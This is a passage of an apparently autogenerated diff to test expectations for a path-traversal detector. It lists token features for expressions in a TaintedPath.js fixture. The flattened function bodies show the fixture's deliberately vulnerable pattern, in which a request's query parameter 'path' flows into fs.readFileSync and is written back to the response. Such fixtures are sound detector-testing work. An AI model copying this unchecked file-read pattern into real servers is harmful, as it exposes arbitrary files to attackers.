url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -4936,6 +59431,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:42:13:42:53 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:42:16:42:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:16:42:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:16:42:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:16:42:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:16:42:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:46 | pathModule.dirname | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:46 | pathModule.dirname | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:46 | pathModule.dirname | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:46 | pathModule.dirname | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:46 | pathModule.dirname | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | pathMod ... e(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | pathMod ... e(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | pathMod ... e(path) | calleeImports | fs | @@ -4945,6 +59460,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:42:29:42:52 | pathMod ... e(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:42:40:42:46 | dirname | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:40:42:46 | dirname | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:42:40:42:46 | dirname | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:42:40:42:46 | dirname | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:42:40:42:46 | dirname | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:42:48:42:51 | path | CalleeFlexibleAccessPath | pathModule.dirname | | autogenerated/TaintedPath/TaintedPath.js:42:48:42:51 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:42:48:42:51 | path | calleeImports | path | @@ -4954,6 +59474,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:42:48:42:51 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:42:48:42:51 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:42:48:42:51 | path | receiverName | pathModule | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:3:44:54 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:7:44:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:7:44:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:7:44:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:7:44:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:7:44:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -4962,6 +59522,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:44:13:44:53 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:44:16:44:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:16:44:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:16:44:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:16:44:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:16:44:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:38 | pathModule | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:38 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:38 | pathModule | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:38 | pathModule | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:38 | pathModule | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:46 | pathModule.extname | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:46 | pathModule.extname | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:46 | pathModule.extname | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:46 | pathModule.extname | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:46 | pathModule.extname | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path res write fs readFileSync /home/user/ path path startsWith /home/user/ res write fs readFileSync path path indexOf secret 1 res write fs readFileSync path fs existsSync path res write fs readFileSync path path foo.txt res write fs readFileSync path path foo.txt path bar.txt res write fs readFileSync path path foo.txt path bar.txt someOpaqueCondition res write fs readFileSync path path sanitize path res write fs readFileSync path path url parse req url true query path res write fs readFileSync pathModule basename path res write fs readFileSync pathModule dirname path res write fs readFileSync pathModule extname path res write fs readFileSync pathModule join path res write fs readFileSync pathModule join x y path z res write fs readFileSync pathModule normalize path res write fs readFileSync pathModule relative x path res write fs readFileSync pathModule relative path x res write fs readFileSync pathModule resolve path res write fs readFileSync pathModule resolve x y path z res write fs readFileSync pathModule toNamespacedPath path | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | exceptional return of pathMod ... e(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | exceptional return of pathMod ... e(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | pathMod ... e(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | pathMod ... e(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | pathMod ... e(path) | calleeImports | fs | @@ -4971,6 +59551,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:44:29:44:52 | pathMod ... e(path) | enclosingFunctionName | 